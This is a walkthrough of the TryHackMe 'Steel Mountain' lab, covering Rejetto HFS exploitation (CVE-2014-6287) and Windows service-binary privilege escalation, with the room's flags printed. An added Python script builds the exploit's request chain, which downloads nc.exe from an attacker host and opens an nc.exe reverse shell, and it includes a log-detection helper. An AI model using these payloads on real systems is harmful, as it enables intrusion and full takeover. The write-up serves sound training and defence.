TryHackMe – Steel Mountain
INTRODUCTION
In this room you will enumerate a Windows machine, gain initial access with Metasploit, use PowerShell to further enumerate the machine and escalate your privileges to Administrator.
If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
Deploy the machine. Who is the employee of the month?
Bill Harper
INITIAL ACCESS
Scan the machine with nmap. What is the other port running a web server on?
8080
Take a look at the other web server. What file server is running?
The page on port 8080 shows a hyperlinked HttpFileServer 2.3; following that link identifies the software:
Rejetto HTTP File Server
What is the CVE number to exploit this file server?
CVE-2014-6287
Use Metasploit to get an initial shell. What is the user flag?
b04763b6fcf51fcd7c13abc7db4fd365
PRIVILEGE ESCALATION
To enumerate this machine we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and flag exploitable misconfigurations: “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”
You can download the script here. Then use Meterpreter's upload command to put the script on the target.
I copied the contents of the script into Sublime Text and saved it as PowerUp.ps1 on Kali.
Uploaded with Meterpreter:
To run it from Meterpreter, load the PowerShell extension with load powershell, then enter an interactive PowerShell session with powershell_shell. From there, dot-source PowerUp.ps1 and run Invoke-AllChecks to get its report:
Pay close attention to the CanRestart option that is set to true. What is the name of the service with the unquoted service path?
AdvancedSystemCareService9
CanRestart being true means we can restart the service ourselves, and the directory holding the service binary is also writable by our user. We can therefore replace the legitimate binary with a malicious one and restart the service, which then runs our program with the service's privileges.
Use msfvenom to generate a reverse shell as a Windows executable.
Upload your binary and replace the legitimate one. Then restart the service to get a shell as root (on Windows, the account the service runs under).
Before restarting the service, we need to set up a listener in a local terminal:
We can then start the service in our meterpreter shell:
Listener connects:
9af5f314f57607c00fd09803a587db80
ACCESS AND ESCALATION WITHOUT METASPLOIT
We will now take a look at gaining access and privilege escalation without the use of Metasploit. For this, we will utilise PowerShell and winPEAS to enumerate the system and collect the relevant information to escalate to root.
We will use the same CVE, but this time use the python script here.
In order for this attack to work, it will require a web server and netcat listener to be active at the same time. If you do not already have a netcat static binary on your system then you can download this from GitHub.
We will also use winPEAS, which can be downloaded here.
For simplicity, I created a folder named steel containing the exploit script (39161.py) and the netcat binary (nc.exe).
winPEAS is already on Kali at /usr/share/winPEAS/winPEASexe/winPEAS/obj/Release/winPEAS.exe, but I copied it into the same folder for this:
Before the attack can run, we need to edit the exploit with our local IP address and the port our listener will use:
Three separate terminal windows are then required to complete the attack.
Terminal 1 – python HTTP web server
Then start a simple python http web server:
Terminal 2 – netcat listener
Terminal 3 – to execute the attack
The final command needs to be run TWICE: the first run pulls the netcat binary onto the target and the second executes the payload to get a callback in the listener. A quick check between the two runs is the HTTP server's terminal, which should show a GET for nc.exe from the target; if it does not, the first stage failed and the second run will not produce a shell.
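As an added example (my own Python, not the page's material and not the 39161.py exploit itself), the script below builds the requests that exploit flow issues against CVE-2014-6287, so the three-stage, run-twice behaviour described above is visible rather than hidden in a screenshot. The target address, the ports, the C:\Users\Public drop paths and the VBScript body are constructed placeholders (the VBScript is a condensed stand-in for the downloader the public exploit writes); nothing here is sent over the network. The last function runs the other way, pulling the injected macro back out of a request URL, which is the same pattern you would look for in HFS or proxy access logs.

```python
"""
CVE-2014-6287 request construction, mirroring the flow of the public HFS 2.3.x exploit
(Exploit-DB 39161) without sending anything. HFS passes the 'search' parameter to its macro
parser; a leading NUL (%00) makes findMacroMarker accept an injected {.macro.} block.
Addresses, ports and file paths are constructed placeholders for this example.
"""
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

PUBLIC_DIR = r"C:\Users\Public"   # assumed world-writable drop directory (the public exploit uses it too)


def hfs_macro_url(target: str, port: int, macro: str) -> str:
    """Place an HFS macro after a NUL byte in the search parameter.

    Only spaces are percent-encoded; braces and pipes are left raw, which is the
    convention the public exploit follows and HFS accepts (assumption for this example).
    """
    return f"http://{target}:{port}/?search=%00{{.{macro.replace(' ', '%20')}.}}"


def exploit_stages(target: str, port: int, lhost: str, http_port: int, lport: int) -> List[str]:
    """The three requests, in order: write a VBScript downloader, run it, run nc.exe.

    Firing all three in one pass races the download, which is why the page's author
    has to run the script twice: pass one drops nc.exe, pass two executes it.
    """
    vbs_path = PUBLIC_DIR + r"\script.vbs"
    nc_path = PUBLIC_DIR + r"\nc.exe"
    # Condensed, constructed stand-in for the downloader the public exploit writes
    # (Microsoft.XMLHTTP fetch + ADODB.Stream save). Statement separator is ':'.
    vbs = (
        'Set h = CreateObject("Microsoft.XMLHTTP") : '
        f'h.Open "GET", "http://{lhost}:{http_port}/nc.exe", False : h.Send : '
        'Set s = CreateObject("ADODB.Stream") : s.Open : s.Type = 1 : '
        f's.Write h.ResponseBody : s.SaveToFile "{nc_path}", 2'
    )
    return [
        hfs_macro_url(target, port, f"save|{vbs_path}|{vbs}"),                    # {.save|path|content.}
        hfs_macro_url(target, port, f"exec|cscript.exe {vbs_path}"),               # {.exec|command.}
        hfs_macro_url(target, port, f"exec|{nc_path} -e cmd.exe {lhost} {lport}"),  # reverse shell
    ]


def injected_macro(url: str) -> Optional[str]:
    """Return the macro injected via CVE-2014-6287 in a request URL, or None.

    The reverse of hfs_macro_url: a NUL followed by {. ... .} in the search value.
    The same test applies to request lines from an HFS or proxy access log.
    """
    for value in parse_qs(urlsplit(url).query).get("search", []):
        if value.startswith("\x00{.") and value.endswith(".}"):
            return value[3:-2]
    return None


if __name__ == "__main__":
    for stage in exploit_stages("10.10.10.10", 8080, "10.9.0.5", 80, 4444):
        print(stage)
        print("   macro:", injected_macro(stage))
```

The defensive half is the cheap one to keep: any search value that decodes to a NUL followed by `{.` is an exploitation attempt against this version of HFS, whatever macro follows it.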
Other terminal windows now look like:
And there’s our shell on the system…
In the shell, we can get winPEAS over for further system enumeration…
Next we can execute winPEAS by running: winPEAS.exe
After running, we can find some services open to potentially overwriting a service binary:
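As an added example (my own Python, not PowerUp, winPEAS or anything from this page), the script below performs the two checks both tools are reporting, here and in the PowerUp section earlier: whether a service's binary path is unquoted and contains spaces, and whether our user can write either to the directory holding the binary (the route this room uses: overwrite the binary in place) or to one of the hijack locations that an unquoted path creates. The service table and the set of writable directories are constructed; the IObit path and the other entries are assumptions for illustration. On a real host PowerUp takes the same inputs from Win32_Service and Get-Acl.

```python
"""
Plain-Python version of the checks PowerUp (Get-ServiceUnquoted, Get-ModifiableServiceFile)
and winPEAS run against Windows services. All inputs are constructed; nothing here touches
a live system.
"""
import ntpath  # Windows path handling regardless of the host OS
from typing import Dict, List, Set, Tuple

# Constructed service table in the shape of `Get-WmiObject Win32_Service | select Name,PathName`.
# The IObit path and the other entries are assumptions for this example, not captured output.
SERVICES: Dict[str, str] = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "GoodVendorSvc": r'"C:\Program Files\Good Vendor\svc.exe" -service',
}

# Constructed stand-in for an ACL check: directories our low-privileged user can write to.
# PowerUp derives this from Get-Acl on a real host; here it is a fixed set.
WRITABLE_DIRS: Set[str] = {
    r"C:\Program Files (x86)\IObit\Advanced SystemCare",
    r"C:\Users\Public",
}


def binary_path(pathname: str) -> Tuple[str, bool]:
    """Split a service PathName into (executable path, was_quoted).

    Quoted: everything between the first pair of double quotes.
    Unquoted: up to and including the first '.exe' (arguments may follow it).
    """
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)], True
    idx = pathname.lower().find(".exe")
    exe = pathname[: idx + 4] if idx != -1 else pathname.split(" ")[0]
    return exe, False


def hijack_candidates(exe: str) -> List[str]:
    """Files CreateProcess tries, in order, before the real binary of an unquoted path.

    'C:\\Program Files\\X Y\\s.exe' -> ['C:\\Program.exe', 'C:\\Program Files\\X.exe']
    """
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def _norm(path: str) -> str:
    return ntpath.normpath(path).lower()


def assess_service(name: str, pathname: str, writable: Set[str]) -> Dict:
    """Decide whether a service is abusable via unquoted-path hijack or binary replacement."""
    exe, quoted = binary_path(pathname)
    unquoted = (not quoted) and (" " in exe)
    wset = {_norm(d) for d in writable}
    candidates = hijack_candidates(exe) if unquoted else []
    return {
        "service": name,
        "binary": exe,
        "unquoted": unquoted,
        "candidates": candidates,
        # hijack route: a candidate whose directory we can write to
        "writable_candidates": [c for c in candidates if _norm(ntpath.dirname(c)) in wset],
        # replacement route (used in this room): the real binary's own directory is writable
        "binary_dir_writable": _norm(ntpath.dirname(exe)) in wset,
    }


def find_abusable(services: Dict[str, str] = SERVICES, writable: Set[str] = WRITABLE_DIRS) -> List[Dict]:
    """Return the assessments for services that offer at least one of the two routes."""
    results = [assess_service(n, p, writable) for n, p in services.items()]
    return [r for r in results if r["writable_candidates"] or r["binary_dir_writable"]]


if __name__ == "__main__":
    for hit in find_abusable():
        print(hit["service"], "->", hit["binary"])
        print("  unquoted:", hit["unquoted"], "candidates:", hit["candidates"])
        print("  writable hijack candidates:", hit["writable_candidates"])
        print("  binary directory writable:", hit["binary_dir_writable"])
```

Note the two routes are distinct: with the constructed ACLs the hijack candidates (C:\Program.exe and friends) sit in directories a normal user cannot write to, so the unquoted path alone would not be exploitable; it is the writable binary directory that makes the service abusable, which is exactly the replacement the room walks through.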
As before, we generate a payload with msfvenom to replace this legitimate service binary:
This can then be pulled to the system via PowerShell:
We can then stop the legitimate service running and replace the application file with our malicious binary:
Before restarting the service, a listener needs to be set up on our local machine on the port used when creating the payload:
With the listener now running, the service can be restarted on the target:
Once this command executes, a reverse shell will appear within the listener.
From here we can switch to the Administrator’s Desktop directory and grab the root.txt file: